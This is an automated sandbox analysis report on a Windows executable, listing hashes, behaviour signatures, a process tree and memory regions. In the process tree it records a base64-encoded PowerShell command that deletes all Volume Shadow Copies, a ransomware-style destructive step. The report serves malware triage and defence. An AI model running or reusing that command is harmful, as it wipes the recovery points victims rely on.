Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:08

General

  • Target

    c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe

  • Size

    164KB

  • MD5

    05bdfc5aae2670314d0b248427a56b36

  • SHA1

    33e1b6b524cbba471ec8638d1cc79e95c2bc415f

  • SHA256

    c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390

  • SHA512

    b2d7bb4ee01dc06e90096ecd558f83a32644b296521082214c485e952b9d36be8419499802d15937c8d51aa47589d99f9025ba139bc4289fc419a5548cd8f333

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
    "C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:860
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1620
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1716

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/860-65-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
      Filesize

      8KB

    • memory/860-71-0x000000000263B000-0x000000000265A000-memory.dmp
      Filesize

      124KB

    • memory/860-70-0x000000001B790000-0x000000001BA8F000-memory.dmp
      Filesize

      3.0MB

    • memory/860-66-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp
      Filesize

      11.4MB

    • memory/860-69-0x0000000002634000-0x0000000002637000-memory.dmp
      Filesize

      12KB

    • memory/860-68-0x0000000002632000-0x0000000002634000-memory.dmp
      Filesize

      8KB

    • memory/860-67-0x0000000002630000-0x0000000002632000-memory.dmp
      Filesize

      8KB

    • memory/1540-60-0x00000000000E0000-0x00000000000EA000-memory.dmp
      Filesize

      40KB

    • memory/1540-64-0x0000000000160000-0x0000000000166000-memory.dmp
      Filesize

      24KB

    • memory/1540-59-0x0000000002610000-0x0000000002719000-memory.dmp
      Filesize

      1.0MB

    • memory/1540-63-0x0000000000150000-0x0000000000151000-memory.dmp
      Filesize

      4KB

    • memory/1540-62-0x0000000000100000-0x0000000000101000-memory.dmp
      Filesize

      4KB

    • memory/1540-61-0x00000000000F0000-0x00000000000F1000-memory.dmp
      Filesize

      4KB

    • memory/1540-54-0x0000000075891000-0x0000000075893000-memory.dmp
      Filesize

      8KB

    • memory/1540-58-0x0000000000350000-0x000000000036F000-memory.dmp
      Filesize

      124KB

    • memory/1540-57-0x0000000002300000-0x000000000242D000-memory.dmp
      Filesize

      1.2MB

    • memory/1540-55-0x0000000000D60000-0x0000000000E29000-memory.dmp
      Filesize

      804KB